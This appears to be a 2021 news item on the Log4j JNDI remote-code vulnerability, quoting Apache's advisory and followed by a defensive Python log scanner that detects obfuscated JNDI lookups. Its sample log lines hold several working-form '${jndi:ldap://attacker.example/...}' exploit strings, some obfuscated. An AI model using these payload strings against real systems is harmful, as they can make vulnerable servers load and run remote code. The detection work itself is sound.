
The Log4j mess

[Security] Posted Dec 12, 2021 16:29 UTC (Sun) by corbet

For those who have not yet seen it, this advisory from Apache describes a nasty vulnerability in the widely used Log4j package.

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

Updating this package is, of course, necessary, but that will only help so much: the library is bundled into a lot of other deployed products, each of which needs its own update. For more information see this Ars Technica article or, for desperate cases, the Logout4Shell utility.
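The advisory above turns on one mechanism: Log4j substitutes "${...}" lookups inside log messages, and lookups nest, so a payload rarely arrives as a literal "${jndi:". As an added example (written for this page; it is not Log4j's code and not part of the original article), here is a small Python normalizer that models just the lookups seen in the common obfuscations (lower, upper, and the ":-default" fallback of the "${lookup:key:-default}" syntax), rewrites nested expressions from the inside out, and then checks the result for a JNDI lookup. The log lines and the host name attacker.example are constructed for the example; the resolver is a deliberate simplification of Log4j's StrSubstitutor, good enough for triage of access or application logs, not a reimplementation.

```python
import re

# An innermost "${...}" expression: one with no further "${" inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"jndi:", re.IGNORECASE)
_MAX_PASSES = 10  # guard against pathological nesting


def _resolve_innermost(expr: str) -> str:
    """Evaluate one innermost lookup expression.

    Simplified model (written for this example, not Log4j's code) of the
    lookups that appear in the commonly observed obfuscated payloads:
    "lower", "upper", and the ":-default" fallback. Any other lookup is
    treated as one that fails, which is exactly why attackers chain it
    with a default value ("${env:NOTEXIST:-j}" yields "j").
    """
    if ":-" in expr:
        body, default = expr.split(":-", 1)
    else:
        body, default = expr, None
    name, _, key = body.partition(":")
    name = name.lower()
    if name == "jndi":
        # Never rewrite the thing we are looking for.
        return "${" + expr + "}"
    if name == "lower":
        return key.lower()
    if name == "upper":
        return key.upper()
    if default is not None:
        return default
    # Unresolvable with no default: left in place, as Log4j would.
    return "${" + expr + "}"


def normalize_lookups(text: str) -> str:
    """Repeatedly rewrite innermost lookups until nothing changes."""
    for _ in range(_MAX_PASSES):
        changed = False

        def repl(m: re.Match) -> str:
            nonlocal changed
            out = _resolve_innermost(m.group(1))
            if out != m.group(0):
                changed = True
            return out

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a (possibly obfuscated) JNDI lookup."""
    return _JNDI.search(normalize_lookups(line)) is not None


def find_jndi_lookups(lines):
    """Return (original line, normalized form) for every suspicious line."""
    return [(ln, normalize_lookups(ln)) for ln in lines if is_jndi_lookup(ln)]


# Constructed sample log lines, not real traffic; attacker.example is a
# placeholder host name, not a known malicious endpoint.
SAMPLE_LINES = [
    'GET /index.html 200 "Mozilla/5.0"',
    'GET / 200 "${jndi:ldap://attacker.example/a}"',
    'GET / 200 "${${lower:j}ndi:ldap://attacker.example/a}"',
    'GET / 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    'GET / 200 "${${env:NOTEXIST:-j}ndi:${lower:l}${lower:d}ap://attacker.example/a}"',
    'POST /login 302 "${lower:HELLO} world"',
]

if __name__ == "__main__":
    for original, normalized in find_jndi_lookups(SAMPLE_LINES):
        print(f"{original}\n  -> {normalized}")
```

A plain grep for "${jndi:" catches only the first of the four malicious sample lines; normalizing first catches all of them and leaves the harmless lookup alone. Matching is case-insensitive because Log4j accepts "${JNDI:" and "${${upper:j}ndi:" just as readily. This is a detection aid for finding what was already logged; the fix remains the one the advisory gives, updating to a release where message lookup substitution is disabled.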

Copyright © 2021, Eklektix, Inc.